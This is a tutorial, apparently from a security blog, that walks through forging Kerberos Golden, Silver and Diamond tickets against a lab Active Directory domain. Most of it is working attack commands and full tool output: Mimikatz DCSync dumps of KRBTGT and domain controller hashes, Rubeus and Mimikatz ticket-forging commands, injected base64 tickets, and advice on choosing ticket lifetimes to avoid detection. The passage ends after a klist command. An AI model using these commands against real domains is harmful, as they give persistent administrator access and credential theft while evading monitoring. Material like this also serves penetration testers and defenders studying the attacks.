If an adversary can gain access to NTLM or AES account keys, they can use these values to generate forged Kerberos tickets. Forging Kerberos tickets can be a great way to maintain access to an Active Directory environment.
This article will look at three common methods of doing this:
Golden Tickets
An adversary with access to a KRBTGT account hash can generate their own Kerberos tickets for any user in a domain, including administrators. This is known as a Golden Ticket Attack.
In older domains, the forged user did not necessarily need to exist in the domain. However, since KB5008380 the user account targeted does need to exist in the domain.
Rubeus can be used to generate forged Kerberos tickets.
Getting Access to the KRBTGT
First we need access to gain access to the KRBTGT account credentials. This account is responsible for the Kerberos Key Distribution Center Service which handles ticket requests and issues Ticket Granting Tickets (TGTs) for users.
We can use Mimikatz to perform a DCSync attack to gain access to the KRBTGT account hash.
mimikatz.exe "privilege::debug" "lsadump::dcsync /user:BORDERGATE\krbtgt" "exit"
.#####. mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/
mimikatz(commandline) # privilege::debug
Privilege '20' OK
mimikatz(commandline) # lsadump::dcsync /user:BORDERGATE\krbtgt
[DC] 'bordergate.local' will be the domain
[DC] 'DC01.bordergate.local' will be the DC server
[DC] 'BORDERGATE\krbtgt' will be the user account
[rpc] Service : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)
Object RDN : krbtgt
** SAM ACCOUNT **
SAM Username : krbtgt
Account Type : 30000000 ( USER_OBJECT )
User Account Control : 00000202 ( ACCOUNTDISABLE NORMAL_ACCOUNT )
Account expiration :
Password last change : 28/04/2024 02:35:48
Object Security ID : S-1-5-21-1220112391-3624315575-3511410581-502
Object Relative ID : 502
Credentials:
Hash NTLM: 9a1b5b20c1959f4bcaf9f4838eba7472
ntlm- 0: 9a1b5b20c1959f4bcaf9f4838eba7472
lm - 0: 6fba1ef75d362808b3594035721f1955
Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
Random Value : 7b31ffa11e101561bcf68f2e3df76299
* Primary:Kerberos-Newer-Keys *
Default Salt : BORDERGATE.LOCALkrbtgt
Default Iterations : 4096
Credentials
aes256_hmac (4096) : aeb1af1a68ee1c76fe30dc91292e628b641b185ab17fdb7139a267130bb44f28
aes128_hmac (4096) : 9d15c219d740aa2989b4f71b66af6df9
des_cbc_md5 (4096) : 1cec2c988513b9b9
* Primary:Kerberos *
Default Salt : BORDERGATE.LOCALkrbtgt
Credentials
des_cbc_md5 : 1cec2c988513b9b9
* Packages *
NTLM-Strong-NTOWF
mimikatz(commandline) # exit
Bye!
Creating a Golden Ticket
Next, we need to use PowerView to get the FQDN of the domain, and it’s associated SID:
PS C:\Tools> . .\PowerView.ps1
PS C:\Tools> Get-Domain
Forest : bordergate.local
DomainControllers : {DC01.bordergate.local}
Children : {}
DomainMode : Unknown
DomainModeLevel : 7
Parent :
PdcRoleOwner : DC01.bordergate.local
RidRoleOwner : DC01.bordergate.local
InfrastructureRoleOwner : DC01.bordergate.local
Name : bordergate.local
PS C:\Tools> Get-DomainSID
S-1-5-21-1220112391-3624315575-3511410581
We can then use Rubeus with the /ptt flag to inject a the ticket for the Administrator user into our session, allowing us to access the domain controller’s C$ share.
C:\Users\alice>dir \\DC01.bordergate.local\C$
Access is denied.
Rubeus.exe golden /aes256:aeb1af1a68ee1c76fe30dc91292e628b641b185ab17fdb7139a267130bb44f28 /user:Administrator /domain:bordergate.local /sid:S-1-5-21-1220112391-3624315575-3511410581 /ptt
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.3.0
[*] Action: Build TGT
[*] Building PAC
[*] Domain : BORDERGATE.LOCAL (BORDERGATE)
[*] SID : S-1-5-21-1220112391-3624315575-3511410581
[*] UserId : 500
[*] Groups : 520,512,513,519,518
[*] ServiceKey : AEB1AF1A68EE1C76FE30DC91292E628B641B185AB17FDB7139A267130BB44F28
[*] ServiceKeyType : KERB_CHECKSUM_HMAC_SHA1_96_AES256
[*] KDCKey : AEB1AF1A68EE1C76FE30DC91292E628B641B185AB17FDB7139A267130BB44F28
[*] KDCKeyType : KERB_CHECKSUM_HMAC_SHA1_96_AES256
[*] Service : krbtgt
[*] Target : bordergate.local
[*] Generating EncTicketPart
[*] Signing PAC
[*] Encrypting EncTicketPart
[*] Generating Ticket
[*] Generated KERB-CRED
[*] Forged a TGT for 'Administrator@bordergate.local'
[*] AuthTime : 29/04/2024 18:05:12
[*] StartTime : 29/04/2024 18:05:12
[*] EndTime : 30/04/2024 01:05:12
[*] RenewTill : 06/05/2024 18:05:12
[*] base64(ticket.kirbi):
doIFuTCCBbWgAwIBBaEDAgEWooIEmDCCBJRhggSQMIIEjKADAgEFoRIbEEJPUkRFUkdBVEUuTE9DQUyi
JTAjoAMCAQKhHDAaGwZrcmJ0Z3QbEGJvcmRlcmdhdGUubG9jYWyjggRIMIIERKADAgESoQMCAQOiggQ2
BIIEMibyjNIyVS2jRtuufcXCQEvPrkrF69mnqDdgwx3ap11aLkH5ixb2FvzqOvYJ6+GmR8I8s1EftgZF
J8wn0Fru8NRp01qUHECVrGVUP1pxAPlZ7PPwBrAS0tMlAh8xpXg6NDGtLWIQsJtHvYC8N/BGupKqDjSy
rcmnpCVjxM4R2rH2NI+ZHt/CSa2yKwNA57ecO91p7xwKOhHsQQMciVdgH0WAmtS0/KMxeK5Bda/Eqqzf
d+tXS/51Y2jjxYd/muFVMrncD6CkrwZjM8Iq51GZnToxxCXbGV28d/EjJYiIbi9tkHO76MGxozjmuWht
SRmc3TLDEoN/vOgDXoWy+bFbpxqYL6eVNuk8oDU0u1yochAhNm3j1zq1oZq2TvhO+PKE4s+7E6qhFAGR
dMCGmPJA0cnAsUwxVr0/nW7Clm5NpNS+gJ8lSsnSoXeNpi+HbyQ7qIVuqU93i/yRDNI4Gvv0wFu7jaun
yAkcYk6L48jqt9G93ZAkZm5UDo2oJUTcnz+MkdK0n8c+8si9PTzkic+z3avS+HH5YFR4eEnSvCnJ1oJ+
IFFFe9EmLW41I2VoEsNpHUBMCBZUQeaF5lAcJP35QUbmh6Xa5FMHJ3RzcT95XRnePSunE4ghpgbXPJW0
wnYJeE3SeBH7EmVh1EJ4uvCL6k13yeeGKInVeFGgnoIPqlbFqywvCDE0wWFaEjt1jCHneP79F++kDVNi
p8XF85nu1PrwneX+I0JvuNHMUA+cMAkZjGxfkHORFsL/NDamHkwLIcCU0OYwZQnaWxz66NbF2bg7M/SK
0whu6XBmPufP2X/cm4elyRCxBAHK/KNc1ipHXz2xTJmNZoOiM72Hx5ua0rKXKry3XX5GFUkBTC4YuSO+
eoHVTupmQHdUSdc+Qtu6iYR5zqeerm7rLd/8PQ+PIS/cnVsUZAcce2lBZ66Q4OTf0r0bMUuy80DD+Vvo
dpY05dju41dhc19a2h5VOlYRQAmwGb5GOFX0ZlvNU2W8nOFwqiMfC4aGJJTx0fYZR7Eg5oCegtE9Wsce
J5nbMRYjeJZHVKCcqxZTgO5WTWfyM4Z7YNUDLJ2hLxBen5e2pb5EQTGfJ8Mh+65HX18DDFtMoFEHLO7d
EeVIrl6jkZE1JaK8doBonMnh0iQadm8EB1XGFrZMVHENipW8kv0nxlXVC+DuqZsZVBKDTXNBtVHfhvsC
HHpny7nX3R0rNFb1SX2O/01CyxT2N6N+pXY1oMmjizgin/u+iD4NcTVdnOKVBkNJiXhoeEpKcOvznJOp
g8lSY36iDFFOSR8j+4evz3NgBM3S/ksRj79bRklxPtK6p/RrleLK6RZRUWfdNjUN++BhpGFCgW6qQEb7
q4bI1KA5MyoEyv4+GWYsbt0y2uaa35qtFItqqqtQB/4Ea1awVH7pYHFcQ88UMXVXdLLCv5IVJgZxCqOC
AQswggEHoAMCAQCigf8Egfx9gfkwgfaggfMwgfAwge2gKzApoAMCARKhIgQg7CuaxBJK6J3dZ4PUxPrW
BhILormRb83cgOB1KqdvgZKhEhsQQk9SREVSR0FURS5MT0NBTKIaMBigAwIBAaERMA8bDUFkbWluaXN0
cmF0b3KjBwMFAEDgAACkERgPMjAyNDA0MjkxNDA1MTJapREYDzIwMjQwNDI5MTQwNTEyWqYRGA8yMDI0
MDQzMDAwMDUxMlqnERgPMjAyNDA1MDYxNDA1MTJaqBIbEEJPUkRFUkdBVEUuTE9DQUypJTAjoAMCAQKh
HDAaGwZrcmJ0Z3QbEGJvcmRlcmdhdGUubG9jYWw=
[+] Ticket successfully imported!
C:\Tools>dir \\DC01\C$
Volume in drive \\DC01\C$ has no label.
Volume Serial Number is 343D-F2D0
Directory of \\DC01\C$
08/05/2021 09:20 <DIR> PerfLogs
28/04/2024 10:27 <DIR> Program Files
08/05/2021 10:40 <DIR> Program Files (x86)
28/04/2024 10:21 <DIR> Users
28/04/2024 10:35 <DIR> Windows
0 File(s) 0 bytes
5 Dir(s) 50,939,592,704 bytes free
The same attack can be performed using Mimikatz:
mimikatz.exe
.#####. mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/
mimikatz # kerberos::golden /domain:bordergate.local /sid:S-1-5-21-1220112391-3624315575-3511410581 /krbtgt:9a1b5b20c1959f4bcaf9f4838eba7472 /user:Administrator /id:500 /ptt
User : Administrator
Domain : bordergate.local (BORDERGATE)
SID : S-1-5-21-1220112391-3624315575-3511410581
User Id : 500
Groups Id : *513 512 520 518 519
ServiceKey: 9a1b5b20c1959f4bcaf9f4838eba7472 - rc4_hmac_nt
Lifetime : 29/04/2024 18:06:13 ; 27/04/2034 18:06:13 ; 27/04/2034 18:06:13
-> Ticket : ** Pass The Ticket **
* PAC generated
* PAC signed
* EncTicketPart generated
* EncTicketPart encrypted
* KrbCred generated
Golden ticket for 'Administrator @ bordergate.local' successfully submitted for current session
It’s possible to detect Golden ticket attacks by;
- Looking for service requests (TGS) have no corresponding TGT requests. This situation can be resolved using diamond tickets.
- By monitoring for tickets with unusually long lifespans.
To ensure that our ticket lifespan meets what’s typical in our target environment, we can first determine the current default policy with PowerView;
PS C:\Tools> . .\PowerView.ps1
PS C:\Tools> Get-DomainPolicy | select -expand KerberosPolicy
MaxTicketAge : 10
MaxRenewAge : 7
MaxServiceAge : 600
MaxClockSkew : 5
TicketValidateClient : 1
Based on this information, we can set the following flags in Mimikatz to generate tickets that look normal for the target environment;
/startoffset:0 /endin:600 /renewmax:7
PS C:\Tools> .\mimikatz.exe
.#####. mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/
mimikatz # kerberos::golden /startoffset:0 /endin:600 /renewmax:7 /domain:bordergate.local /sid:S-1-5-21-1220112391-3624315575-3511410581 /krbtgt:9a1b5b20c1959f4bcaf9f4838eba7472 /user:Administrator /id:500 /ptt
User : Administrator
Domain : bordergate.local (BORDERGATE)
SID : S-1-5-21-1220112391-3624315575-3511410581
User Id : 500
Groups Id : *513 512 520 518 519
ServiceKey: 9a1b5b20c1959f4bcaf9f4838eba7472 - rc4_hmac_nt
Lifetime : 30/04/2024 18:39:40 ; 01/05/2024 02:39:40 ; 30/04/2024 18:46:40
-> Ticket : ** Pass The Ticket **
* PAC generated
* PAC signed
* EncTicketPart generated
* EncTicketPart encrypted
* KrbCred generated
Golden ticket for 'Administrator @ bordergate.local' successfully submitted for current session
Silver Tickets
Silver ticket attacks allow an adversary to forge TGS (Ticket Granting Service) tickets for a specific service. The benefits of this attack over golden tickets is no interaction with a domain controller is required, therefore potentially being more stealthy.
Getting Access to a Service Account
First we need to extract the service account password for the domain controller (dc01$).
mimikatz.exe "privilege::debug" "lsadump::dcsync /user:BORDERGATE\dc01$" "exit"
.#####. mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/
mimikatz(commandline) # privilege::debug
Privilege '20' OK
mimikatz(commandline) # lsadump::dcsync /user:BORDERGATE\dc01$
[DC] 'bordergate.local' will be the domain
[DC] 'DC01.bordergate.local' will be the DC server
[DC] 'BORDERGATE\dc01$' will be the user account
[rpc] Service : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)
Object RDN : DC01
** SAM ACCOUNT **
SAM Username : DC01$
Account Type : 30000001 ( MACHINE_ACCOUNT )
User Account Control : 00082000 ( SERVER_TRUST_ACCOUNT TRUSTED_FOR_DELEGATION )
Account expiration :
Password last change : 28/04/2024 18:36:16
Object Security ID : S-1-5-21-1220112391-3624315575-3511410581-1000
Object Relative ID : 1000
Credentials:
Hash NTLM: e04ae9e43f82df634c9e61d09577acb4
Supplemental Credentials:
* Primary:Kerberos-Newer-Keys *
Default Salt : BORDERGATE.LOCALhostdc01.bordergate.local
Default Iterations : 4096
Credentials
aes256_hmac (4096) : 80a2a9da3c916b5a7b30bda3b5e35eec1561f065f4307358674c4b93fe5e2423
aes128_hmac (4096) : ed536a8d7a0daf906314d7387e8d2845
des_cbc_md5 (4096) : eaf1fb629e13c81f
OldCredentials
aes256_hmac (4096) : e7637bed1b981202d5497de82f4931d30b06d70068b40037b9e0acc60a124ed9
aes128_hmac (4096) : 76935fc442752233880f5aa0b23730e3
des_cbc_md5 (4096) : 790e8a4cd9dc0413
* Primary:Kerberos *
Default Salt : BORDERGATE.LOCALhostdc01.bordergate.local
Credentials
des_cbc_md5 : eaf1fb629e13c81f
OldCredentials
des_cbc_md5 : 790e8a4cd9dc0413
* Packages *
NTLM-Strong-NTOWF
mimikatz(commandline) # exit
Bye!
Creating a Silver Ticket
With access to the service account hash, we can then use Rubeus to generate a silver ticket to access the CIFS service:
C:\Tools>rubeus.exe silver /service:cifs/dc01.bordergate.local /aes256:80a2a9da3c916b5a7b30bda3b5e35eec1561f065f4307358674c4b93fe5e2423 /domain:bordergate.local /sid:S-1-5-21-1220112391-3624315575-3511410581 /ptt /user:dc01$
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.3.0
[*] Action: Build TGS
[*] Building PAC
[*] Domain : BORDERGATE.LOCAL (BORDERGATE)
[*] SID : S-1-5-21-1220112391-3624315575-3511410581
[*] UserId : 500
[*] Groups : 520,512,513,519,518
[*] ServiceKey : 80A2A9DA3C916B5A7B30BDA3B5E35EEC1561F065F4307358674C4B93FE5E2423
[*] ServiceKeyType : KERB_CHECKSUM_HMAC_SHA1_96_AES256
[*] KDCKey : 80A2A9DA3C916B5A7B30BDA3B5E35EEC1561F065F4307358674C4B93FE5E2423
[*] KDCKeyType : KERB_CHECKSUM_HMAC_SHA1_96_AES256
[*] Service : cifs
[*] Target : dc01.bordergate.local
[*] Generating EncTicketPart
[*] Signing PAC
[*] Encrypting EncTicketPart
[*] Generating Ticket
[*] Generated KERB-CRED
[*] Forged a TGS for 'dc01$' to 'cifs/dc01.bordergate.local'
[*] AuthTime : 29/04/2024 18:04:22
[*] StartTime : 29/04/2024 18:04:22
[*] EndTime : 30/04/2024 03:04:22
[*] RenewTill : 06/05/2024 18:04:22
[*] base64(ticket.kirbi):
doIFdzCCBXOgAwIBBaEDAgEWooIEWzCCBFdhggRTMIIET6ADAgEFoRIbEEJPUkRFUkdBVEUuTE9DQUyi
KDAmoAMCAQKhHzAdGwRjaWZzGxVkYzAxLmJvcmRlcmdhdGUubG9jYWyjggQIMIIEBKADAgESoQMCAQOi
ggP2BIID8mIanR3pno2NO0KdJSuHBveCO3YFMIfGov/FXWBYQOeRTy+x9MEl2ylJ25JvGCC/Q6g5n9ol
84hL8Tm2CyafV55HjJsD+zkvCf0YDAC2tf6YtoCNiGyYv/iH/5ki1Ux6dyok73YHGqvR9jwUnplB2Q11
nw8itpXz0cpGeB1GWBJztOIZQd81qCga2OLaYZT7EV/yxrWBMRKZ8R7I2jxlC1vJWRfcXim8naEnceHb
vPbRvL4o2jF+5Wx5kTcSEZXNypwXiz4YLL2W4NE/gJGQnvp6dLG35XpQFM+tr1s8yrysa9By8RO/R3bR
LG9V36z2f3jckRQmXYEcIzjbGl041ZZoXn8aDSimiqT+gKkVWrCmZcT5E5a0AjmEn/Mq4BuUpHry1M7p
jPXmKJRqamQeVgcIiig7v+fvEdudZn0eR43EmUSs4AJC0YsuyxS7N25o/yPBZhxorlmVUvPSYtpHkgRX
NjfePh600wamFHVOlpq7YMYI/v2PUMxzj57i5i5YlSsDMHeNEuaou4A9MmdMvi2hhHiWq7VTnXbJZcJL
z2XJQ99B+twWrQlWZ+KXiLEpP9f9jezgt9x8LqudSbWNXMQB4XEkTDT8haSgR4aqSsyQnVYzhKcyfoP9
floiKKrU+sOLlw3Ds3fdphL3KoCXf/OrZshhLBOrYNZZ7q/hQrxdDx6enHYMvLjuMw5cnjJst5knAmwe
sybb9aaKAvvfao7fWtqfvUcPXBCEirTBrgdMSStd0wMY3J5r0NUThq1vcLRqE89fnbl/B2+V9zkegfN4
FBxQIKoq2foW1Ome+nJfrn9i2m7nLpM0/GSN684xxF4PTqvYi8qnsmL6SqXWQ/GlAuJVS0GkVUkxUO2T
YiTz8bTmm3s9a13IPS5VCVRHtSIFfpsv+ApV3kZ+xUgAATxoKao6lqWvy7h3BARiLQd1n875DVHGBahE
Gyhf2oMBGZGsFT/6eWvR19uivOInOCP2ZpFiiyyKScWuAtk3Pm8P2vqzl8JwUo31k+97IOiVMyFlx2jm
bHtvB/YrTZhQCWW+Db3mSFhO0cBwYy14lIMtEq4Dzs6HWn8zdAJ3aQDlC+Vv6+CJvyuu/RzFlKE/kwFG
dDRHE8rFQxjhnIvDmBwBZTFJ0cfCWMf7J8SxtXUbcIWifn2lp73uaMsZw29QSfL7qwqseO/zH+ZK5wee
XQwvLouPMS9P5FPUVMmNo1LVKfkzvLvZf+Ae/DwhPufFh8qXtplcArtUV8oyOfGdhL5jpNGN02bLNQfv
rXWgxEIMbrX/nv7RI+t0upX3ICh+5egDPSqoktOEiQuHHQ7bSseTKsWVxhKHkURH/SGRCEDp7RBQo4IB
BjCCAQKgAwIBAKKB+gSB932B9DCB8aCB7jCB6zCB6KArMCmgAwIBEqEiBCDMn2jXRb/3UrD5ppIp+tg6
0mBQthnPWbam/idQh1OtiKESGxBCT1JERVJHQVRFLkxPQ0FMohIwEKADAgEBoQkwBxsFZGMwMSSjBwMF
AECgAACkERgPMjAyNDA0MjkxNjA0MjJapREYDzIwMjQwNDI5MTYwNDIyWqYRGA8yMDI0MDQzMDAyMDQy
MlqnERgPMjAyNDA1MDYxNjA0MjJaqBIbEEJPUkRFUkdBVEUuTE9DQUypKDAmoAMCAQKhHzAdGwRjaWZz
GxVkYzAxLmJvcmRlcmdhdGUubG9jYWw=
[+] Ticket successfully imported!
C:\Tools>dir \\dc01.bordergate.local\c$
Volume in drive \\dc01.bordergate.local\c$ has no label.
Volume Serial Number is 343D-F2D0
Directory of \\dc01.bordergate.local\c$
08/05/2021 09:20 <DIR> PerfLogs
28/04/2024 10:27 <DIR> Program Files
08/05/2021 10:40 <DIR> Program Files (x86)
28/04/2024 10:21 <DIR> Users
28/04/2024 10:35 <DIR> Windows
0 File(s) 0 bytes
5 Dir(s) 50,926,878,720 bytes free
Diamond Tickets
Forged Golden and Silver tickets can be detected since the service requests (TGS) have no corresponding TGT requests.
In a Diamond ticket attack, an adversary requests valid TGT from a domain controller. This is then decrypted using the KRBTGT account hash, modified to meet the adversaries requirements then re-encrypted. Since an initial TGT request takes place, this reduces the chance of detection in comparison to a Golden Ticket attack.
C:\Tools>dir \\dc01.bordergate.local\C$
Access is denied.
C:\Tools>dir \\dc01\C$
Access is denied.
C:\Tools>Rubeus.exe diamond /krbkey:aeb1af1a68ee1c76fe30dc91292e628b641b185ab17fdb7139a267130bb44f28 /tgtdeleg /enctype:aes /ticketuser:Administrator /domain:bordergate.local /ticketuserid:500 /ptt
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.3.0
[*] Action: Diamond Ticket
[*] No target SPN specified, attempting to build 'cifs/dc.domain.com'
[*] Initializing Kerberos GSS-API w/ fake delegation for target 'cifs/DC01.bordergate.local'
[+] Kerberos GSS-API initialization success!
[+] Delegation requset success! AP-REQ delegation ticket is now in GSS-API output.
[*] Found the AP-REQ delegation ticket in the GSS-API output.
[*] Authenticator etype: aes256_cts_hmac_sha1
[*] Extracted the service ticket session key from the ticket cache: t/DPs5uWq4XvahoWh0mK0Uv4hiwa/n5TyR4R7p06d6Y=
[+] Successfully decrypted the authenticator
[*] base64(ticket.kirbi):
doIFrDCCBaigAwIBBaEDAgEWooIEqDCCBKRhggSgMIIEnKADAgEFoRIbEEJPUkRFUkdBVEUuTE9DQUyi
JTAjoAMCAQKhHDAaGwZrcmJ0Z3QbEEJPUkRFUkdBVEUuTE9DQUyjggRYMIIEVKADAgESoQMCAQKiggRG
BIIEQpUv6/+7xqLqaIJ9xJ3YMuMU7G4UoNQ5sMaVBZRHVOf2AwMyHLbx7vSLS0W2H49iwL0ABkCwnL7n
uwUcSRNacBM3w9EgDEfSedVV6hCEQnfBd/Vy0Mb7NtaGF+8psLZNWbjWuuh+jaetoYu2u96lBQkrO4in
topPGrxaLYJNski2glgQi2omojj3qxh64HxJ0aSv4fo+eVkvxejrtaa35Zy6FZ1SgkD4QWCR8cAIaX6U
izpmhwTurY63NO8mghY+dYsxl2JwOxpmkzxVHFvp/uXko4M+blTqf5P7QvdIG9oPFCVvy+QWKNwyz7i9
8O0pYWCOnJoRYHhlonVq/a2Vw3b8fJ5jTD7bPFwvunQzdevu1NIXK2Z1UuXookY87qKyH1JVQyKTd0l3
NfeCB7uwwymzziP0hTd7dIpqKKOzgbI1rQUCl0Xcr86itj+ai2Ur8yXwf69IMZUYI6I5uwj+MN8/SIVi
BgjilGig+mFRllgk6aCVrWvq/8nbLEbWqmTOObL8u9nOmzeUZ3pqkmYKPPYr6Dh2fGd8Igrpv/fCmVM7
OumSOA6ZV9neFdFxMVU6QP7Z+9FY26CRKYBrzLjJ6qiN29wQQqU4J/Ox5AWAgd8lV0SOlib4sEBTvI6v
5RK4ktTunBCU2JHQDlcEoVMx/jAnYLR4jnMmXkFk9agHKJoTifpF1oONqW+LRmB/fLgkKBBJje/yMESJ
eaSydb6Cp+jdNLfnSqHm9L/W5E1orfLjFj1t1duLMgRJ0iEHRQyYMOyfttBts5hNsAMJ+QF1oGVlRoWv
Hh7V5tsnzz6AKN/kO7EC3sVb9iNVEP6LY+RFf/2+EnOWcr8qn6bu15sOCdFzOJ/Ebsy95Ya+rSUdg764
CBKCwCqJVDfb3K+VYem9xrB4ofSCM/uc1dE33OCioDjdO23lyPrGQVOMu7KUDyPJwypRR7wGO7E09Lgx
zPJzFKpwn5kaTC1muF0LI6R7EpjCNIHKU3X2gaMaRPVrBPOpeJZo9TW4B8xSIk+EOOpiU57Xn2TlZD4e
np7Lql4TJTdvBmK57eMTKXoiDh1kne79i3buw94IkkwVFwrKrm9ILI2t8T7cDnTftkoknpMyEPy8I+D0
If8wbWDQMlmjihYW4QckSycParF1OIfPH4uBVsSZKwMt+ke+ayB49N9bvNAcvH4CC1v1MOjy5ruc2Jzj
Ts8bwVgcku40sDQTg9Dn08T4EZCaqXVa9TuCdKbz+s9RxctkOBy7rniHZNjk6rUKbjN8xIoWGnyILnuh
bAh4Ky5z65izGB2GdggHHgRFYgX6J2VdVT+MCtBz39RQcs0PcxqexnlTxwq47GQwqJ4V3OpGuCS1g8pY
enEpnegQM2t2DNLksIaGIzEiTFbLH9C20GIzNFwIYp30VL/0HILRje15WuqAY7Ph0mIAOest/IHiDfXu
yvz91m/ZuIqsvQQat8Ojge8wgeygAwIBAKKB5ASB4X2B3jCB26CB2DCB1TCB0qArMCmgAwIBEqEiBCCK
bjp9Am+uC2DueQoTup4VO2XeocleiNQrE7iyCfLxj6ESGxBCT1JERVJHQVRFLkxPQ0FMohIwEKADAgEB
oQkwBxsFYWxpY2WjBwMFAGChAAClERgPMjAyNDA0MzAxNTE2NDVaphEYDzIwMjQwNTAxMDAwMDM4WqcR
GA8yMDI0MDUwNzE0MDAzOFqoEhsQQk9SREVSR0FURS5MT0NBTKklMCOgAwIBAqEcMBobBmtyYnRndBsQ
Qk9SREVSR0FURS5MT0NBTA==
[*] Decrypting TGT
[*] Retreiving PAC
[*] Modifying PAC
[*] Signing PAC
[*] Encrypting Modified TGT
[*] base64(ticket.kirbi):
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
[+] Ticket successfully imported!
C:\Tools>klist
Current LogonId is 0:0x192612
Cached Tickets: (1)
